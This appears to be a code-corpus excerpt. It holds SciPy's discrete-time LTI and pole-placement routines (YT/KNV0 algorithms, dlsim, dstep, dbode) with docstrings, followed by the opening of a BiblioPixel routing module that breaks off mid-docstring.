ker_pole_imo_mu1 = np.dot(ker_pole[i], mu1)
ker_pole_i_nu1 = np.dot(ker_pole[j], nu1)
ker_pole_mu_nu = np.vstack((ker_pole_imo_mu1, ker_pole_i_nu1))
else:
ker_pole_ij = np.vstack((
np.hstack((ker_pole[i],
np.zeros(ker_pole[i].shape))),
np.hstack((np.zeros(ker_pole[j].shape),
ker_pole[j]))
))
mu_nu_matrix = np.vstack(
(np.hstack((mu1, mu2)), np.hstack((nu1, nu2)))
)
ker_pole_mu_nu = np.dot(ker_pole_ij, mu_nu_matrix)
transfer_matrix_ij = np.dot(np.dot(ker_pole_mu_nu, ker_pole_mu_nu.T),
transfer_matrix_j_mo_transfer_matrix_j)
if not np.allclose(transfer_matrix_ij, 0):
transfer_matrix_ij = (np.sqrt(2)*transfer_matrix_ij /
np.linalg.norm(transfer_matrix_ij))
transfer_matrix[:, i] = transfer_matrix_ij[
:transfer_matrix[:, i].shape[0], 0
]
transfer_matrix[:, j] = transfer_matrix_ij[
transfer_matrix[:, i].shape[0]:, 0
]
else:
# As in knv0 if transfer_matrix_j_mo_transfer_matrix_j is orthogonal to
# Vect{ker_pole_mu_nu} assign transfer_matrixi/transfer_matrix_j to
# ker_pole_mu_nu and iterate. As we are looking for a vector in
# Vect{Matker_pole_MU_NU} (see section 6.1 page 19) this might help
# (that's a guess, not a claim !)
transfer_matrix[:, i] = ker_pole_mu_nu[
:transfer_matrix[:, i].shape[0], 0
]
transfer_matrix[:, j] = ker_pole_mu_nu[
transfer_matrix[:, i].shape[0]:, 0
]
def _YT_complex(ker_pole, Q, transfer_matrix, i, j):
"""
Applies algorithm from YT section 6.2 page 20 related to complex pairs
"""
# step 1 page 20
ur = np.sqrt(2)*Q[:, -2, np.newaxis]
ui = np.sqrt(2)*Q[:, -1, np.newaxis]
u = ur + 1j*ui
# step 2 page 20
ker_pole_ij = ker_pole[i]
m = np.dot(np.dot(np.conj(ker_pole_ij.T), np.dot(u, np.conj(u).T) -
np.dot(np.conj(u), u.T)), ker_pole_ij)
# step 3 page 20
e_val, e_vec = np.linalg.eig(m)
# sort eigenvalues according to their module
e_val_idx = np.argsort(np.abs(e_val))
mu1 = e_vec[:, e_val_idx[-1], np.newaxis]
mu2 = e_vec[:, e_val_idx[-2], np.newaxis]
# what follows is a rough python translation of the formulas
# in section 6.2 page 20 (step 4)
# remember transfer_matrix_i has been split as
# transfer_matrix[i]=real(transfer_matrix_i) and
# transfer_matrix[j]=imag(transfer_matrix_i)
transfer_matrix_j_mo_transfer_matrix_j = (
transfer_matrix[:, i, np.newaxis] +
1j*transfer_matrix[:, j, np.newaxis]
)
if not np.allclose(np.abs(e_val[e_val_idx[-1]]),
np.abs(e_val[e_val_idx[-2]])):
ker_pole_mu = np.dot(ker_pole_ij, mu1)
else:
mu1_mu2_matrix = np.hstack((mu1, mu2))
ker_pole_mu = np.dot(ker_pole_ij, mu1_mu2_matrix)
transfer_matrix_i_j = np.dot(np.dot(ker_pole_mu, np.conj(ker_pole_mu.T)),
transfer_matrix_j_mo_transfer_matrix_j)
if not np.allclose(transfer_matrix_i_j, 0):
transfer_matrix_i_j = (transfer_matrix_i_j /
np.linalg.norm(transfer_matrix_i_j))
transfer_matrix[:, i] = np.real(transfer_matrix_i_j[:, 0])
transfer_matrix[:, j] = np.imag(transfer_matrix_i_j[:, 0])
else:
# same idea as in YT_real
transfer_matrix[:, i] = np.real(ker_pole_mu[:, 0])
transfer_matrix[:, j] = np.imag(ker_pole_mu[:, 0])
def _YT_loop(ker_pole, transfer_matrix, poles, B, maxiter, rtol):
"""
Algorithm "YT" Tits, Yang. Globally Convergent
Algorithms for Robust Pole Assignment by State Feedback
http://drum.lib.umd.edu/handle/1903/5598
The poles P have to be sorted accordingly to section 6.2 page 20
"""
# The IEEE edition of the YT paper gives useful information on the
# optimal update order for the real poles in order to minimize the number
# of times we have to loop over all poles, see page 1442
nb_real = poles[np.isreal(poles)].shape[0]
# hnb => Half Nb Real
hnb = nb_real // 2
# Stick to the indices in the paper and then remove one to get numpy array
# index it is a bit easier to link the code to the paper this way even if it
# is not very clean. The paper is unclear about what should be done when
# there is only one real pole => use KNV0 on this real pole seem to work
if nb_real > 0:
#update the biggest real pole with the smallest one
update_order = [[nb_real], [1]]
else:
update_order = [[],[]]
r_comp = np.arange(nb_real+1, len(poles)+1, 2)
# step 1.a
r_p = np.arange(1, hnb+nb_real % 2)
update_order[0].extend(2*r_p)
update_order[1].extend(2*r_p+1)
# step 1.b
update_order[0].extend(r_comp)
update_order[1].extend(r_comp+1)
# step 1.c
r_p = np.arange(1, hnb+1)
update_order[0].extend(2*r_p-1)
update_order[1].extend(2*r_p)
# step 1.d
if hnb == 0 and np.isreal(poles[0]):
update_order[0].append(1)
update_order[1].append(1)
update_order[0].extend(r_comp)
update_order[1].extend(r_comp+1)
# step 2.a
r_j = np.arange(2, hnb+nb_real % 2)
for j in r_j:
for i in range(1, hnb+1):
update_order[0].append(i)
update_order[1].append(i+j)
# step 2.b
if hnb == 0 and np.isreal(poles[0]):
update_order[0].append(1)
update_order[1].append(1)
update_order[0].extend(r_comp)
update_order[1].extend(r_comp+1)
# step 2.c
r_j = np.arange(2, hnb+nb_real % 2)
for j in r_j:
for i in range(hnb+1, nb_real+1):
idx_1 = i+j
if idx_1 > nb_real:
idx_1 = i+j-nb_real
update_order[0].append(i)
update_order[1].append(idx_1)
# step 2.d
if hnb == 0 and np.isreal(poles[0]):
update_order[0].append(1)
update_order[1].append(1)
update_order[0].extend(r_comp)
update_order[1].extend(r_comp+1)
# step 3.a
for i in range(1, hnb+1):
update_order[0].append(i)
update_order[1].append(i+hnb)
# step 3.b
if hnb == 0 and np.isreal(poles[0]):
update_order[0].append(1)
update_order[1].append(1)
update_order[0].extend(r_comp)
update_order[1].extend(r_comp+1)
update_order = np.array(update_order).T-1
stop = False
nb_try = 0
while nb_try < maxiter and not stop:
det_transfer_matrixb = np.abs(np.linalg.det(transfer_matrix))
for i, j in update_order:
if i == j:
assert i == 0, "i!=0 for KNV call in YT"
assert np.isreal(poles[i]), "calling KNV on a complex pole"
_KNV0(B, ker_pole, transfer_matrix, i, poles)
else:
transfer_matrix_not_i_j = np.delete(transfer_matrix, (i, j),
axis=1)
# after merge of gh-4249 great speed improvements could be
# achieved using QR updates instead of full QR in the line below
#to debug with numpy qr uncomment the line below
#Q, _ = np.linalg.qr(transfer_matrix_not_i_j, mode="complete")
Q, _ = s_qr(transfer_matrix_not_i_j, mode="full")
if np.isreal(poles[i]):
assert np.isreal(poles[j]), "mixing real and complex " + \
"in YT_real" + str(poles)
_YT_real(ker_pole, Q, transfer_matrix, i, j)
else:
assert ~np.isreal(poles[i]), "mixing real and complex " + \
"in YT_real" + str(poles)
_YT_complex(ker_pole, Q, transfer_matrix, i, j)
det_transfer_matrix = np.max((np.sqrt(np.spacing(1)),
np.abs(np.linalg.det(transfer_matrix))))
cur_rtol = np.abs(
(det_transfer_matrix -
det_transfer_matrixb) /
det_transfer_matrix)
if cur_rtol < rtol and det_transfer_matrix > np.sqrt(np.spacing(1)):
# Convergence test from YT page 21
stop = True
nb_try += 1
return stop, cur_rtol, nb_try
def _KNV0_loop(ker_pole, transfer_matrix, poles, B, maxiter, rtol):
"""
Loop over all poles one by one and apply KNV method 0 algorithm
"""
# This method is useful only because we need to be able to call
# _KNV0 from YT without looping over all poles, otherwise it would
# have been fine to mix _KNV0_loop and _KNV0 in a single function
stop = False
nb_try = 0
while nb_try < maxiter and not stop:
det_transfer_matrixb = np.abs(np.linalg.det(transfer_matrix))
for j in range(B.shape[0]):
_KNV0(B, ker_pole, transfer_matrix, j, poles)
det_transfer_matrix = np.max((np.sqrt(np.spacing(1)),
np.abs(np.linalg.det(transfer_matrix))))
cur_rtol = np.abs((det_transfer_matrix - det_transfer_matrixb) /
det_transfer_matrix)
if cur_rtol < rtol and det_transfer_matrix > np.sqrt(np.spacing(1)):
# Convergence test from YT page 21
stop = True
nb_try += 1
return stop, cur_rtol, nb_try
def place_poles(A, B, poles, method="YT", rtol=1e-3, maxiter=30):
"""
Compute K such that eigenvalues (A - dot(B, K))=poles.
K is the gain matrix such as the plant described by the linear system
``AX+BU`` will have its closed-loop poles, i.e the eigenvalues ``A - B*K``,
as close as possible to those asked for in poles.
SISO, MISO and MIMO systems are supported.
Parameters
----------
A, B : ndarray
State-space representation of linear system ``AX + BU``.
poles : array_like
Desired real poles and/or complex conjugates poles.
Complex poles are only supported with ``method="YT"`` (default).
method: {'YT', 'KNV0'}, optional
Which method to choose to find the gain matrix K. One of:
- 'YT': Yang Tits
- 'KNV0': Kautsky, Nichols, Van Dooren update method 0
See References and Notes for details on the algorithms.
rtol: float, optional
After each iteration the determinant of the eigenvectors of
``A - B*K`` is compared to its previous value, when the relative
error between these two values becomes lower than `rtol` the algorithm
stops. Default is 1e-3.
maxiter: int, optional
Maximum number of iterations to compute the gain matrix.
Default is 30.
Returns
-------
full_state_feedback : Bunch object
full_state_feedback is composed of:
gain_matrix : 1-D ndarray
The closed loop matrix K such as the eigenvalues of ``A-BK``
are as close as possible to the requested poles.
computed_poles : 1-D ndarray
The poles corresponding to ``A-BK`` sorted as first the real
poles in increasing order, then the complex congugates in
lexicographic order.
requested_poles : 1-D ndarray
The poles the algorithm was asked to place sorted as above,
they may differ from what was achieved.
X : 2-D ndarray
The transfer matrix such as ``X * diag(poles) = (A - B*K)*X``
(see Notes)
rtol : float
The relative tolerance achieved on ``det(X)`` (see Notes).
`rtol` will be NaN if it is possible to solve the system
``diag(poles) = (A - B*K)``, or 0 when the optimization
algorithms can't do anything i.e when ``B.shape[1] == 1``.
nb_iter : int
The number of iterations performed before converging.
`nb_iter` will be NaN if it is possible to solve the system
``diag(poles) = (A - B*K)``, or 0 when the optimization
algorithms can't do anything i.e when ``B.shape[1] == 1``.
Notes
-----
The Tits and Yang (YT), [2]_ paper is an update of the original Kautsky et
al. (KNV) paper [1]_. KNV relies on rank-1 updates to find the transfer
matrix X such that ``X * diag(poles) = (A - B*K)*X``, whereas YT uses
rank-2 updates. This yields on average more robust solutions (see [2]_
pp 21-22), furthermore the YT algorithm supports complex poles whereas KNV
does not in its original version. Only update method 0 proposed by KNV has
been implemented here, hence the name ``'KNV0'``.
KNV extended to complex poles is used in Matlab's ``place`` function, YT is
distributed under a non-free licence by Slicot under the name ``robpole``.
It is unclear and undocumented how KNV0 has been extended to complex poles
(Tits and Yang claim on page 14 of their paper that their method can not be
used to extend KNV to complex poles), therefore only YT supports them in
this implementation.
As the solution to the problem of pole placement is not unique for MIMO
systems, both methods start with a tentative transfer matrix which is
altered in various way to increase its determinant. Both methods have been
proven to converge to a stable solution, however depending on the way the
initial transfer matrix is chosen they will converge to different
solutions and therefore there is absolutely no guarantee that using
``'KNV0'`` will yield results similar to Matlab's or any other
implementation of these algorithms.
Using the default method ``'YT'`` should be fine in most cases; ``'KNV0'``
is only provided because it is needed by ``'YT'`` in some specific cases.
Furthermore ``'YT'`` gives on average more robust results than ``'KNV0'``
when ``abs(det(X))`` is used as a robustness indicator.
[2]_ is available as a technical report on the following URL:
http://drum.lib.umd.edu/handle/1903/5598
References
----------
.. [1] J. Kautsky, N.K. Nichols and P. van Dooren, "Robust pole assignment
in linear state feedback", International Journal of Control, Vol. 41
pp. 1129-1155, 1985.
.. [2] A.L. Tits and Y. Yang, "Globally convergent algorithms for robust
pole assignment by state feedback, IEEE Transactions on Automatic
Control, Vol. 41, pp. 1432-1452, 1996.
Examples
--------
A simple example demonstrating real pole placement using both KNV and YT
algorithms. This is example number 1 from section 4 of the reference KNV
publication ([1]_):
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
>>> A = np.array([[ 1.380, -0.2077, 6.715, -5.676 ],
... [-0.5814, -4.290, 0, 0.6750 ],
... [ 1.067, 4.273, -6.654, 5.893 ],
... [ 0.0480, 4.273, 1.343, -2.104 ]])
>>> B = np.array([[ 0, 5.679 ],
... [ 1.136, 1.136 ],
... [ 0, 0, ],
... [-3.146, 0 ]])
>>> P = np.array([-0.2, -0.5, -5.0566, -8.6659])
Now compute K with KNV method 0, with the default YT method and with the YT
method while forcing 100 iterations of the algorithm and print some results
after each call.
>>> fsf1 = signal.place_poles(A, B, P, method='KNV0')
>>> fsf1.gain_matrix
array([[ 0.20071427, -0.96665799, 0.24066128, -0.10279785],
[ 0.50587268, 0.57779091, 0.51795763, -0.41991442]])
>>> fsf2 = signal.place_poles(A, B, P) # uses YT method
>>> fsf2.computed_poles
array([-8.6659, -5.0566, -0.5 , -0.2 ])
>>> fsf3 = signal.place_poles(A, B, P, rtol=-1, maxiter=100)
>>> fsf3.X
array([[ 0.52072442+0.j, -0.08409372+0.j, -0.56847937+0.j, 0.74823657+0.j],
[-0.04977751+0.j, -0.80872954+0.j, 0.13566234+0.j, -0.29322906+0.j],
[-0.82266932+0.j, -0.19168026+0.j, -0.56348322+0.j, -0.43815060+0.j],
[ 0.22267347+0.j, 0.54967577+0.j, -0.58387806+0.j, -0.40271926+0.j]])
The absolute value of the determinant of X is a good indicator to check the
robustness of the results, both ``'KNV0'`` and ``'YT'`` aim at maximizing
it. Below a comparison of the robustness of the results above:
>>> abs(np.linalg.det(fsf1.X)) < abs(np.linalg.det(fsf2.X))
True
>>> abs(np.linalg.det(fsf2.X)) < abs(np.linalg.det(fsf3.X))
True
Now a simple example for complex poles:
>>> A = np.array([[ 0, 7/3., 0, 0 ],
... [ 0, 0, 0, 7/9. ],
... [ 0, 0, 0, 0 ],
... [ 0, 0, 0, 0 ]])
>>> B = np.array([[ 0, 0 ],
... [ 0, 0 ],
... [ 1, 0 ],
... [ 0, 1 ]])
>>> P = np.array([-3, -1, -2-1j, -2+1j]) / 3.
>>> fsf = signal.place_poles(A, B, P, method='YT')
We can plot the desired and computed poles in the complex plane:
>>> t = np.linspace(0, 2*np.pi, 401)
>>> plt.plot(np.cos(t), np.sin(t), 'k--') # unit circle
>>> plt.plot(fsf.requested_poles.real, fsf.requested_poles.imag,
... 'wo', label='Desired')
>>> plt.plot(fsf.computed_poles.real, fsf.computed_poles.imag, 'bx',
... label='Placed')
>>> plt.grid()
>>> plt.axis('image')
>>> plt.axis([-1.1, 1.1, -1.1, 1.1])
>>> plt.legend(bbox_to_anchor=(1.05, 1), loc=2, numpoints=1)
"""
# Move away all the inputs checking, it only adds noise to the code
update_loop, poles = _valid_inputs(A, B, poles, method, rtol, maxiter)
# The current value of the relative tolerance we achieved
cur_rtol = 0
# The number of iterations needed before converging
nb_iter = 0
# Step A: QR decomposition of B page 1132 KN
# to debug with numpy qr uncomment the line below
# u, z = np.linalg.qr(B, mode="complete")
u, z = s_qr(B, mode="full")
rankB = np.linalg.matrix_rank(B)
u0 = u[:, :rankB]
u1 = u[:, rankB:]
z = z[:rankB, :]
# If we can use the identity matrix as X the solution is obvious
if B.shape[0] == rankB:
# if B is square and full rank there is only one solution
# such as (A+BK)=inv(X)*diag(P)*X with X=eye(A.shape[0])
# i.e K=inv(B)*(diag(P)-A)
# if B has as many lines as its rank (but not square) there are many
# solutions and we can choose one using least squares
# => use lstsq in both cases.
# In both cases the transfer matrix X will be eye(A.shape[0]) and I
# can hardly think of a better one so there is nothing to optimize
#
# for complex poles we use the following trick
#
# |a -b| has for eigenvalues a+b and a-b
# |b a|
#
# |a+bi 0| has the obvious eigenvalues a+bi and a-bi
# |0 a-bi|
#
# e.g solving the first one in R gives the solution
# for the second one in C
diag_poles = np.zeros(A.shape)
idx = 0
while idx < poles.shape[0]:
p = poles[idx]
diag_poles[idx, idx] = np.real(p)
if ~np.isreal(p):
diag_poles[idx, idx+1] = -np.imag(p)
diag_poles[idx+1, idx+1] = np.real(p)
diag_poles[idx+1, idx] = np.imag(p)
idx += 1 # skip next one
idx += 1
gain_matrix = np.linalg.lstsq(B, diag_poles-A, rcond=-1)[0]
transfer_matrix = np.eye(A.shape[0])
cur_rtol = np.nan
nb_iter = np.nan
else:
# step A (p1144 KNV) and begining of step F: decompose
# dot(U1.T, A-P[i]*I).T and build our set of transfer_matrix vectors
# in the same loop
ker_pole = []
# flag to skip the conjugate of a complex pole
skip_conjugate = False
# select orthonormal base ker_pole for each Pole and vectors for
# transfer_matrix
for j in range(B.shape[0]):
if skip_conjugate:
skip_conjugate = False
continue
pole_space_j = np.dot(u1.T, A-poles[j]*np.eye(B.shape[0])).T
# after QR Q=Q0|Q1
# only Q0 is used to reconstruct the qr'ed (dot Q, R) matrix.
# Q1 is orthogonnal to Q0 and will be multiplied by the zeros in
# R when using mode "complete". In default mode Q1 and the zeros
# in R are not computed
# To debug with numpy qr uncomment the line below
# Q, _ = np.linalg.qr(pole_space_j, mode="complete")
Q, _ = s_qr(pole_space_j, mode="full")
ker_pole_j = Q[:, pole_space_j.shape[1]:]
# We want to select one vector in ker_pole_j to build the transfer
# matrix, however qr returns sometimes vectors with zeros on the
# same line for each pole and this yields very long convergence
# times.
# Or some other times a set of vectors, one with zero imaginary
# part and one (or several) with imaginary parts. After trying
# many ways to select the best possible one (eg ditch vectors
# with zero imaginary part for complex poles) I ended up summing
# all vectors in ker_pole_j, this solves 100% of the problems and
# is a valid choice for transfer_matrix.
# This way for complex poles we are sure to have a non zero
# imaginary part that way, and the problem of lines full of zeros
# in transfer_matrix is solved too as when a vector from
# ker_pole_j has a zero the other one(s) when
# ker_pole_j.shape[1]>1) for sure won't have a zero there.
transfer_matrix_j = np.sum(ker_pole_j, axis=1)[:, np.newaxis]
transfer_matrix_j = (transfer_matrix_j /
np.linalg.norm(transfer_matrix_j))
if ~np.isreal(poles[j]): # complex pole
transfer_matrix_j = np.hstack([np.real(transfer_matrix_j),
np.imag(transfer_matrix_j)])
ker_pole.extend([ker_pole_j, ker_pole_j])
# Skip next pole as it is the conjugate
skip_conjugate = True
else: # real pole, nothing to do
ker_pole.append(ker_pole_j)
if j == 0:
transfer_matrix = transfer_matrix_j
else:
transfer_matrix = np.hstack((transfer_matrix, transfer_matrix_j))
if rankB > 1: # otherwise there is nothing we can optimize
stop, cur_rtol, nb_iter = update_loop(ker_pole, transfer_matrix,
poles, B, maxiter, rtol)
if not stop and rtol > 0:
# if rtol<=0 the user has probably done that on purpose,
# don't annoy him
err_msg = (
"Convergence was not reached after maxiter iterations.\n"
"You asked for a relative tolerance of %f we got %f" %
(rtol, cur_rtol)
)
warnings.warn(err_msg)
# reconstruct transfer_matrix to match complex conjugate pairs,
# ie transfer_matrix_j/transfer_matrix_j+1 are
# Re(Complex_pole), Im(Complex_pole) now and will be Re-Im/Re+Im after
transfer_matrix = transfer_matrix.astype(complex)
idx = 0
while idx < poles.shape[0]-1:
if ~np.isreal(poles[idx]):
rel = transfer_matrix[:, idx].copy()
img = transfer_matrix[:, idx+1]
# rel will be an array referencing a column of transfer_matrix
# if we don't copy() it will changer after the next line and
# and the line after will not yield the correct value
transfer_matrix[:, idx] = rel-1j*img
transfer_matrix[:, idx+1] = rel+1j*img
idx += 1 # skip next one
idx += 1
try:
m = np.linalg.solve(transfer_matrix.T, np.dot(np.diag(poles),
transfer_matrix.T)).T
gain_matrix = np.linalg.solve(z, np.dot(u0.T, m-A))
except np.linalg.LinAlgError:
raise ValueError("The poles you've chosen can't be placed. "
"Check the controllability matrix and try "
"another set of poles")
# Beware: Kautsky solves A+BK but the usual form is A-BK
gain_matrix = -gain_matrix
# K still contains complex with ~=0j imaginary parts, get rid of them
gain_matrix = np.real(gain_matrix)
full_state_feedback = Bunch()
full_state_feedback.gain_matrix = gain_matrix
full_state_feedback.computed_poles = _order_complex_poles(
np.linalg.eig(A - np.dot(B, gain_matrix))[0]
)
full_state_feedback.requested_poles = poles
full_state_feedback.X = transfer_matrix
full_state_feedback.rtol = cur_rtol
full_state_feedback.nb_iter = nb_iter
return full_state_feedback
def dlsim(system, u, t=None, x0=None):
"""
Simulate output of a discrete-time linear system.
Parameters
----------
system : tuple of array_like or instance of `dlti`
A tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1: (instance of `dlti`)
* 3: (num, den, dt)
* 4: (zeros, poles, gain, dt)
* 5: (A, B, C, D, dt)
u : array_like
An input array describing the input at each time `t` (interpolation is
assumed between given times). If there are multiple inputs, then each
column of the rank-2 array represents an input.
t : array_like, optional
The time steps at which the input is defined. If `t` is given, it
must be the same length as `u`, and the final value in `t` determines
the number of steps returned in the output.
x0 : array_like, optional
The initial conditions on the state vector (zero by default).
Returns
-------
tout : ndarray
Time values for the output, as a 1-D array.
yout : ndarray
System response, as a 1-D array.
xout : ndarray, optional
Time-evolution of the state-vector. Only generated if the input is a
`StateSpace` system.
See Also
--------
lsim, dstep, dimpulse, cont2discrete
Examples
--------
A simple integrator transfer function with a discrete time step of 1.0
could be implemented as:
>>> from scipy import signal
>>> tf = ([1.0,], [1.0, -1.0], 1.0)
>>> t_in = [0.0, 1.0, 2.0, 3.0]
>>> u = np.asarray([0.0, 0.0, 1.0, 1.0])
>>> t_out, y = signal.dlsim(tf, u, t=t_in)
>>> y.T
array([[ 0., 0., 0., 1.]])
"""
# Convert system to dlti-StateSpace
if isinstance(system, lti):
raise AttributeError('dlsim can only be used with discrete-time dlti '
'systems.')
elif not isinstance(system, dlti):
system = dlti(*system[:-1], dt=system[-1])
# Condition needed to ensure output remains compatible
is_ss_input = isinstance(system, StateSpace)
system = system._as_ss()
u = np.atleast_1d(u)
if u.ndim == 1:
u = np.atleast_2d(u).T
if t is None:
out_samples = len(u)
stoptime = (out_samples - 1) * system.dt
else:
stoptime = t[-1]
out_samples = int(np.floor(stoptime / system.dt)) + 1
# Pre-build output arrays
xout = np.zeros((out_samples, system.A.shape[0]))
yout = np.zeros((out_samples, system.C.shape[0]))
tout = np.linspace(0.0, stoptime, num=out_samples)
# Check initial condition
if x0 is None:
xout[0, :] = np.zeros((system.A.shape[1],))
else:
xout[0, :] = np.asarray(x0)
# Pre-interpolate inputs into the desired time steps
if t is None:
u_dt = u
else:
if len(u.shape) == 1:
u = u[:, np.newaxis]
u_dt_interp = interp1d(t, u.transpose(), copy=False, bounds_error=True)
u_dt = u_dt_interp(tout).transpose()
# Simulate the system
for i in range(0, out_samples - 1):
xout[i+1, :] = (np.dot(system.A, xout[i, :]) +
np.dot(system.B, u_dt[i, :]))
yout[i, :] = (np.dot(system.C, xout[i, :]) +
np.dot(system.D, u_dt[i, :]))
# Last point
yout[out_samples-1, :] = (np.dot(system.C, xout[out_samples-1, :]) +
np.dot(system.D, u_dt[out_samples-1, :]))
if is_ss_input:
return tout, yout, xout
else:
return tout, yout
def dimpulse(system, x0=None, t=None, n=None):
"""
Impulse response of discrete-time system.
Parameters
----------
system : tuple of array_like or instance of `dlti`
A tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1: (instance of `dlti`)
* 3: (num, den, dt)
* 4: (zeros, poles, gain, dt)
* 5: (A, B, C, D, dt)
x0 : array_like, optional
Initial state-vector. Defaults to zero.
t : array_like, optional
Time points. Computed if not given.
n : int, optional
The number of time points to compute (if `t` is not given).
Returns
-------
tout : ndarray
Time values for the output, as a 1-D array.
yout : ndarray
Impulse response of system. Each element of the tuple represents
the output of the system based on an impulse in each input.
See Also
--------
impulse, dstep, dlsim, cont2discrete
"""
# Convert system to dlti-StateSpace
if isinstance(system, dlti):
system = system._as_ss()
elif isinstance(system, lti):
raise AttributeError('dimpulse can only be used with discrete-time '
'dlti systems.')
else:
system = dlti(*system[:-1], dt=system[-1])._as_ss()
# Default to 100 samples if unspecified
if n is None:
n = 100
# If time is not specified, use the number of samples
# and system dt
if t is None:
t = np.linspace(0, n * system.dt, n, endpoint=False)
else:
t = np.asarray(t)
# For each input, implement a step change
yout = None
for i in range(0, system.inputs):
u = np.zeros((t.shape[0], system.inputs))
u[0, i] = 1.0
one_output = dlsim(system, u, t=t, x0=x0)
if yout is None:
yout = (one_output[1],)
else:
yout = yout + (one_output[1],)
tout = one_output[0]
return tout, yout
def dstep(system, x0=None, t=None, n=None):
"""
Step response of discrete-time system.
Parameters
----------
system : tuple of array_like
A tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1: (instance of `dlti`)
* 3: (num, den, dt)
* 4: (zeros, poles, gain, dt)
* 5: (A, B, C, D, dt)
x0 : array_like, optional
Initial state-vector. Defaults to zero.
t : array_like, optional
Time points. Computed if not given.
n : int, optional
The number of time points to compute (if `t` is not given).
Returns
-------
tout : ndarray
Output time points, as a 1-D array.
yout : ndarray
Step response of system. Each element of the tuple represents
the output of the system based on a step response to each input.
See Also
--------
step, dimpulse, dlsim, cont2discrete
"""
# Convert system to dlti-StateSpace
if isinstance(system, dlti):
system = system._as_ss()
elif isinstance(system, lti):
raise AttributeError('dstep can only be used with discrete-time dlti '
'systems.')
else:
system = dlti(*system[:-1], dt=system[-1])._as_ss()
# Default to 100 samples if unspecified
if n is None:
n = 100
# If time is not specified, use the number of samples
# and system dt
if t is None:
t = np.linspace(0, n * system.dt, n, endpoint=False)
else:
t = np.asarray(t)
# For each input, implement a step change
yout = None
for i in range(0, system.inputs):
u = np.zeros((t.shape[0], system.inputs))
u[:, i] = np.ones((t.shape[0],))
one_output = dlsim(system, u, t=t, x0=x0)
if yout is None:
yout = (one_output[1],)
else:
yout = yout + (one_output[1],)
tout = one_output[0]
return tout, yout
def dfreqresp(system, w=None, n=10000, whole=False):
"""
Calculate the frequency response of a discrete-time system.
Parameters
----------
system : an instance of the `dlti` class or a tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1 (instance of `dlti`)
* 2 (numerator, denominator, dt)
* 3 (zeros, poles, gain, dt)
* 4 (A, B, C, D, dt)
w : array_like, optional
Array of frequencies (in radians/sample). Magnitude and phase data is
calculated for every value in this array. If not given a reasonable
set will be calculated.
n : int, optional
Number of frequency points to compute if `w` is not given. The `n`
frequencies are logarithmically spaced in an interval chosen to
include the influence of the poles and zeros of the system.
whole : bool, optional
Normally, if 'w' is not given, frequencies are computed from 0 to the
Nyquist frequency, pi radians/sample (upper-half of unit-circle). If
`whole` is True, compute frequencies from 0 to 2*pi radians/sample.
Returns
-------
w : 1D ndarray
Frequency array [radians/sample]
H : 1D ndarray
Array of complex magnitude values
Notes
-----
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``z^2 + 3z + 5`` would be represented as ``[1, 3, 5]``).
.. versionadded:: 0.18.0
Examples
--------
Generating the Nyquist plot of a transfer function
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
Transfer function: H(z) = 1 / (z^2 + 2z + 3)
>>> sys = signal.TransferFunction([1], [1, 2, 3], dt=0.05)
>>> w, H = signal.dfreqresp(sys)
>>> plt.figure()
>>> plt.plot(H.real, H.imag, "b")
>>> plt.plot(H.real, -H.imag, "r")
>>> plt.show()
"""
if not isinstance(system, dlti):
if isinstance(system, lti):
raise AttributeError('dfreqresp can only be used with '
'discrete-time systems.')
system = dlti(*system[:-1], dt=system[-1])
if isinstance(system, StateSpace):
# No SS->ZPK code exists right now, just SS->TF->ZPK
system = system._as_tf()
if not isinstance(system, (TransferFunction, ZerosPolesGain)):
raise ValueError('Unknown system type')
if system.inputs != 1 or system.outputs != 1:
raise ValueError("dfreqresp requires a SISO (single input, single "
"output) system.")
if w is not None:
worN = w
else:
worN = n
if isinstance(system, TransferFunction):
# Convert numerator and denominator from polynomials in the variable
# 'z' to polynomials in the variable 'z^-1', as freqz expects.
num, den = TransferFunction._z_to_zinv(system.num.ravel(), system.den)
w, h = freqz(num, den, worN=worN, whole=whole)
elif isinstance(system, ZerosPolesGain):
w, h = freqz_zpk(system.zeros, system.poles, system.gain, worN=worN,
whole=whole)
return w, h
def dbode(system, w=None, n=100):
"""
Calculate Bode magnitude and phase data of a discrete-time system.
Parameters
----------
system : an instance of the LTI class or a tuple describing the system.
The following gives the number of elements in the tuple and
the interpretation:
* 1 (instance of `dlti`)
* 2 (num, den, dt)
* 3 (zeros, poles, gain, dt)
* 4 (A, B, C, D, dt)
w : array_like, optional
Array of frequencies (in radians/sample). Magnitude and phase data is
calculated for every value in this array. If not given a reasonable
set will be calculated.
n : int, optional
Number of frequency points to compute if `w` is not given. The `n`
frequencies are logarithmically spaced in an interval chosen to
include the influence of the poles and zeros of the system.
Returns
-------
w : 1D ndarray
Frequency array [rad/time_unit]
mag : 1D ndarray
Magnitude array [dB]
phase : 1D ndarray
Phase array [deg]
Notes
-----
If (num, den) is passed in for ``system``, coefficients for both the
numerator and denominator should be specified in descending exponent
order (e.g. ``z^2 + 3z + 5`` would be represented as ``[1, 3, 5]``).
.. versionadded:: 0.18.0
Examples
--------
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
Transfer function: H(z) = 1 / (z^2 + 2z + 3)
>>> sys = signal.TransferFunction([1], [1, 2, 3], dt=0.05)
Equivalent: sys.bode()
>>> w, mag, phase = signal.dbode(sys)
>>> plt.figure()
>>> plt.semilogx(w, mag) # Bode magnitude plot
>>> plt.figure()
>>> plt.semilogx(w, phase) # Bode phase plot
>>> plt.show()
"""
w, y = dfreqresp(system, w=w, n=n)
if isinstance(system, dlti):
dt = system.dt
else:
dt = system[-1]
mag = 20.0 * numpy.log10(abs(y))
phase = numpy.rad2deg(numpy.unwrap(numpy.angle(y)))
return w / dt, mag, phase
| mit |
ManiacalLabs/BiblioPixel | bibliopixel/control/routing.py | 2 | 2424 | from .. project import construct
from .. util import deprecated, flatten
from . action import ActionList
from . receiver import Receiver
class Routing(Receiver):
"""
A dict that routes a message to an ActionList.
"""
def __init__(self, routing, default, python_path):
"""
:param dict routing: `routing` is a dict that maps addresses
to lists of actions.
The values in the input dictionary `routing` are recursively visited
to build the routing table:
* values that are strings or lists are used to construct ActionLists
* dictionaries that contain "typename" or "datatype" keys are
